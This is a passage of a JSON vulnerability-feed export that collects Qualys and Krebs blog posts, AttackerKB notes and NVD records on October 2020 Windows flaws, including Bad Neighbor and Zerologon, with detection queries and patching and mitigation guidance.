The patches for Flash Player are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be actively attacked today, all patches should be prioritized on systems with these products installed.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>).", "cvss3": {}, "published": "2020-10-13T18:52:03", "type": "qualysblog", "title": "October 2020 Patch Tuesday \u2013 87 Vulnerabilities, 11 Critical, SharePoint, TCP/IP Stack, Graphics, Adobe Vulns", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-16898", "CVE-2020-16923", "CVE-2020-16951", "CVE-2020-16952"], "modified": "2020-10-13T18:52:03", "id": "QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-28T04:15:50", "description": "On October 13, 2020, Microsoft fixed a critical remote code execution vulnerability in the Windows TCP/IP stack\u2019s handling of ICMPv6 Router Advertisement packets. Since Microsoft ranks this vulnerability as \u201cExploitation More Likely,\u201d we may see a proof-of-concept released soon. The security issue has received a critical severity rating score of 9.8 based on the CVSS v3 scoring system. 
\n\n#### Vulnerability Details:\n\n[McAfee Advanced Threat Research](<https://github.com/advanced-threat-research/CVE-2020-16898>) released a test script that demonstrates a Denial of Service causing an immediate BSOD (Blue Screen of Death); however, the flaw could potentially lead to remote code execution and could be weaponized into a chain reaction in which attacks spread from one vulnerable machine to another (wormable).\n\nA maliciously crafted IPv6 Router Advertisement packet carrying an RDNSS (Recursive DNS Server) option can remotely trigger the flaw in the Windows _tcpip.sys_ driver, leading to a DoS. The vulnerability stems from _tcpip.sys_ parsing ICMPv6 messages incorrectly; the logic flaw can be turned into a buffer overflow that places extra bytes on the stack. Because the vulnerability lies within the Router Advertisement message of the ICMPv6 Neighbor Discovery Protocol, it is also known as \u201cBad Neighbor.\u201d\n\n#### Affected products:\n\n * Windows 10 Version 1709\n * Windows 10 Version 1803\n * Windows 10 Version 1809\n * Windows 10 Version 1903\n * Windows 10 Version 1909\n * Windows 10 Version 2004\n * Windows Server 2019\n\nA complete list of affected devices is available on Microsoft\u2019s October 2020 [security advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>).\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify Windows systems.\n\n_`operatingSystem: \"Windows 10\" OR operatingSystem: \"Windows Server 2019\"`_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 "CVE-2020-16898". This helps in automatically grouping existing hosts with this vulnerability as well as any new hosts that spin up in your environment. 
Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### Discover TCP/IP Stack "CVE-2020-16898" Vulnerability\n\nNow that hosts with CVE-2020-16898 are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Windows TCP/IP Stack vulnerability based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018CVE-2020-16898\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_`vulnerabilities.vulnerability.qid:91686`_\n\nThis will return a list of all impacted hosts.\n\n\n\nQID 91686 is available in signature version VULNSIGS-2.5.6-3 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.6.3-2 and above.\n\nAlong with the QID 91686, Qualys released IG QID 45468 to help customers track assets on which "ICMPv6 RDNSS" is disabled in the Windows TCP/IP settings. \n\n_`QID 45468 : Microsoft Windows TCP/IP ICMPv6 RDNSS Disabled`_\n\nUsing VMDR, the Windows TCP/IP Stack vulnerability can be prioritized for the following real-time threat indicators (RTIs):\n\n * Remote Code Execution\n * Easy Exploit\n * Denial of Service\n * High Data Loss\n * High Lateral Movement\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets for the Bad Neighbor threat feed to see the vulnerability and impacted host details. 
\n\n### Response by Patching and Remediation \n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201ccve: CVE-2020-16898\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 CVE-2020-16898. \n\n\n\nFor proactive, continuous patching, you can create a job without a Patch Window to ensure all hosts will continue to receive the required patches as new patches become available for emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n**Configuration management adds context to overall vulnerability management** \n \nWith the [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) module of VMDR, you can automatically discover the status of the RA (Router Advertisement) based DNS configuration setting. \n\n * Qualys Control ID 19571, \u201cStatus of the \u2018RA Based DNS Config (RFC 6106)\u2019 parameter of network interface\u201d, is evaluated to check whether RA Based DNS Config is disabled; the status is reported in the result section. \n\n### Mitigation\n\nAs per the advisory, the following mitigations should be applied in addition to patching the installations:\n\n * Disable ICMPv6 RDNSS (only available for Windows 1709 and above).\n \n \n _netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable_\n\n * Additionally, ICMPv6 Router Advertisements can be blocked or dropped at the network perimeter.\n\nUsers are advised to review their Microsoft Windows installations with Microsoft\u2019s October 2020 [security advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>) mentioned above. 
\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority Windows TCP/IP Stack RCE vulnerability CVE-2020-16898.\n\n### **References**\n\n<https://github.com/advanced-threat-research/CVE-2020-16898>\n\n<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>", "cvss3": {}, "published": "2020-10-14T20:28:33", "type": "qualysblog", "title": "Microsoft Windows TCP/IP Remote Code Execution Vulnerability (CVE-2020-16898) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-14T20:28:33", "id": "QUALYSBLOG:7799BDEDC6C56E9CAE494D08410C252D", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-02T12:43:58", "description": "**Update October 1, 2020**: Microsoft has [added step-by-step Zerologon patching instructions ](<https://www.databreachtoday.com/microsoft-issues-updated-patching-directions-for-zerologon-a-15090>)because the original instructions "proved confusing to users and may have caused issues with other business operations."\n\n**Update October 1, 2020**: Qualys released new QID 91680 to add a remote (unauthenticated) check for the Zerologon vulnerability. The update is included in VULNSIGS-2.4.998-3 and later. \n\n_`QID 91680 : Microsoft Windows Netlogon Elevation of Privilege Vulnerability (unauthenticated check)`_\n\n**Update Sept 24, 2020**: Microsoft is detecting [active attacks leveraging the Zerologon vulnerability](<https://www.zdnet.com/article/microsoft-says-it-detected-active-attacks-leveraging-zerologon-vulnerability/>). 
Security teams are advised to patch vulnerable systems immediately.\n\nOn Sept 11, 2020, a Dutch team, collectively known as Secura, published an [exploit](<https://github.com/SecuraBV/CVE-2020-1472>) showing how an unauthenticated remote user can take control of the domain controller and gain admin privileges. The vulnerability ([CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)) received the maximum severity rating score of 10.0 based on the CVSS v3 scoring system.\n\nThe prime elements of this vulnerability are the weak encryption and the authentication process used in the Netlogon protocol. Although new Windows Domain Controllers use standard AES-256 encryption, the incorrect use of the AES mode allows an attacker to spoof the identity of any computer (DC) account and replace its password with all zeroes or an empty password. Because the final output replaces all characters of the password with zeroes, this bug is also well known as \u201cZerologon\u201d.\n\n**Affected Products**\n\n * Windows Server 2008\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n\nA complete list of affected devices is available on Microsoft\u2019s August 2020 security [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>).\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify Windows systems.\n\n_`(operatingSystem.category1:``Windows`` and operatingSystem.category2:``Server``)`_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 "Zerologon". This helps in automatically grouping existing hosts with Zerologon as well as any new Windows server that spins up in your environment. 
Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n### Discover Zerologon "CVE-2020-1472" Vulnerability\n\nNow that hosts with Zerologon are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like Zerologon based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Zerologon\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_`vulnerabilities.vulnerability.qid:91668`_\n\nOR you could modify your search to :\n\n_`Vulnerability - vulnerabilities.vulnerability.qid:91668`_\n\n_`Asset - (operatingSystem.category1:``Windows`` and operatingSystem.category2:``Server``)`_\n\nThis will return a list of all impacted hosts.\n\n\n\nQID 91668 is available in signature version VULNSIGS-2.4.958-3 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.4.958.3-2 and above.\n\nAlong with the QID 91668, Qualys released the following IG QID 45461 to help customers track domain controller assets on which netlogon secure channel mode is enabled. This QID can be detected using authenticated scanning using VULNSIGS-2.4.986-3 and above or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.4.986.3-2 and above. \n\n_`QID 45461 : Microsoft Windows Domain Controller Netlogon Secure Channel Enforcement Mode Enabled`_\n\n**Update October 1, 2020**: Qualys released new QID 91680 to add a remote (unauthenticated) check for the Zerologon vulnerability. 
The update is included in VULNSIGS-2.4.998-3 and later.\n\n_`QID 91680 : Microsoft Windows Netlogon Elevation of Privilege Vulnerability (unauthenticated check)`_\n\nPlease Note: We have tested the QID across Qualys lab environment on a variety of Windows versions, and we have not observed any issues. In case you experience issues with the remote detection, please reach out to Qualys Support for immediate attention.\n\nUsing VMDR, the Zerologon vulnerability can be prioritized for the following real-time threat indicators (RTIs):\n\n * Remote Code Execution\n * Privilege Escalation\n * Exploit Public\n * Active Attack\n * Denial of Service\n * High Data Loss\n * High Lateral Movement\n * Predicted High Risk\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets for the Zerologon threat feed to see the vulnerability and impacted host details. \n\nWith VMDR Dashboard, you can track Zerologon, impacted hosts, their status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of Zerologon vulnerability trends in your environment using [Zerologon Dashboard Link](<https://qualys-secure.force.com/customer/s/article/000006405>).\n\n\n\n### Response by Patching and Remediation \n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201cqid: 91668\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 Zerologon. 
\n\n\n\nFor proactive, continuous patching, you can create a job without a Patch Window to ensure all hosts will continue to receive the required patches as new patches become available for emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n### Solution\n\nUsers are advised to review their Microsoft Windows installations with Microsoft\u2019s August 2020 security [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) mentioned above. For Windows devices, a patch to be published in Feb 2021 would place domain controllers in enforcement mode; any non-compliant device must then be explicitly allowed by adding an exception for its account.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority Zerologon vulnerability CVE-2020-1472.\n\n### **References**\n\n<https://www.secura.com/pathtoimg.php?id=2055>\n\n<https://github.com/SecuraBV/CVE-2020-1472>\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>", "cvss3": {}, "published": "2020-09-15T19:55:08", "type": "qualysblog", "title": "Microsoft Netlogon Vulnerability (CVE-2020-1472 \u2013 Zerologon) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-15T19:55:08", "id": "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-10-04T22:45:06", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 
\u2018Microsoft SharePoint Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-16951.\n\n \n**Recent assessments:** \n \n**wvu-r7** at October 13, 2020 7:56pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\n**ccondon-r7** at October 16, 2020 7:04pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-16T00:00:00", "type": "attackerkb", "title": "CVE-2020-16952 \u2014 Microsoft SharePoint Remote Code Execution Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-16898", "CVE-2020-16951", "CVE-2020-16952"], "modified": "2020-10-22T00:00:00", "id": 
This CVE ID is unique from CVE-2020-16905.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16909", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16905", "CVE-2020-16909"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-16909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16909", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:25:20", "description": "An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.To exploit this vulnerability, an authenticated attacker could run a specially crafted application, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-16938.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16901", "cwe": ["CWE-665"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16901", "CVE-2020-16938"], "modified": "2020-10-20T20:26:00", "cpe": ["cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:1909"], "id": "CVE-2020-16901", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16901", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:26:42", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-16901.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16938", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16901", "CVE-2020-16938"], "modified": "2020-10-20T20:05:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:2004"], "id": "CVE-2020-16938", 
"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16938", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T18:36:31", "description": "A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-12T11:15:00", "type": "cve", "title": "CVE-2020-5135", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-23T00:55:00", "cpe": ["cpe:/o:sonicwall:sonicosv:6.5.4.4", "cpe:/o:sonicwall:sonicos:6.0.5.3", "cpe:/o:sonicwall:sonicos:6.5.1.11", "cpe:/o:sonicwall:sonicos:6.5.4.7", "cpe:/o:sonicwall:sonicos:7.0.0.0"], "id": "CVE-2020-5135", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5135", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:sonicwall:sonicos:7.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicos:6.5.1.11:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicos:6.5.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicosv:6.5.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:sonicwall:sonicos:6.0.5.3:*:*:*:*:*:*:*"]}], "krebs": [{"lastseen": "2020-10-21T10:10:49", "description": "It's Cybersecurity Awareness Month! In keeping with that theme, if you (ab)use **Microsoft Windows** computers you should be aware the company shipped a bevy of software updates today to fix at least 87 security problems in Windows and programs that run on top of the operating system. That means it's once again time to backup and patch up.\n\n\n\nEleven of the vulnerabilities earned Microsoft's most-dire "critical" rating, which means bad guys or malware could use them to gain complete control over an unpatched system with little or no help from users.\n\nWorst in terms of outright scariness is probably [CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>), which is a nasty bug in **Windows 10** and **Windows Server 2019** that could be abused to install malware just by sending a malformed packet of data at a vulnerable system. CVE-2020-16898 earned a [CVSS Score](<https://www.first.org/cvss/>) of 9.8 (10 is the most awful).\n\nSecurity vendor **McAfee** has dubbed the flaw "**Bad Neighbor**," and in [a blog post](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>) about it said a proof-of-concept exploit shared by Microsoft with its partners appears to be "both extremely simple and perfectly reliable," noting that this sucker is imminently "wormable" -- i.e. 
capable of being weaponized into a threat that spreads very quickly within networks.\n\n"It results in an immediate BSOD (Blue Screen of Death), but more so, indicates the likelihood of exploitation for those who can manage to bypass Windows 10 and Windows Server 2019 mitigations," McAfee's **Steve Povolny** wrote. "The effects of an exploit that would grant remote code execution would be widespread and highly impactful, as this type of bug could be made wormable."\n\n**Trend Micro's Zero Day Initiative** (ZDI) calls special attention to another critical bug quashed in this month's patch batch: [CVE-2020-16947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>), which is a problem with **Microsoft Outlook** that could result in malware being loaded onto a system_ just by previewing a malicious email in Outlook_.\n\n"The Preview Pane is an attack vector here, so you don\u2019t even need to open the mail to be impacted," said ZDI's** Dustin Childs**.\n\nWhile there don't appear to be any zero-day flaws in October's release from Microsoft, **Todd Schell** from **Ivanti** points out that a half-dozen of these flaws were publicly disclosed prior to today, meaning bad guys have had a jump start on being able to research and engineer working exploits.\n\nOther patches released today tackle problems in **Exchange Server**, **Visual Studio**, **.NET Framework**, and a whole mess of other core Windows components.\n\nFor any of you who've been pining for a **Flash Player** patch from **Adobe**, your days of waiting are over. 
After several months of depriving us of Flash fixes, Adobe's shipped an update that fixes a single -- [albeit critical](<https://helpx.adobe.com/security/products/flash-player/apsb20-58.html>) -- flaw in the program that crooks could use to install bad stuff on your computer just by getting you to visit a hacked or malicious website.\n\n**Chrome** and **Firefox** both now disable Flash by default, and Chrome and **IE/Edge** auto-update the program when new security updates are available. Mercifully, Adobe is slated to retire Flash Player later this year, and Microsoft has said it plans to ship updates at the end of the year that will remove Flash from Windows machines.\n\nIt's a good idea for Windows users to get in the habit of updating at least once a month, but for regular users (read: not enterprises) it's usually safe to wait a few days until after the patches are released, so that Microsoft has time to iron out any chinks in the new armor.\n\nBut before you update, please make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates even have known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. 
Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T20:10:36", "type": "krebs", "title": "Microsoft Patch Tuesday, October 2020 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 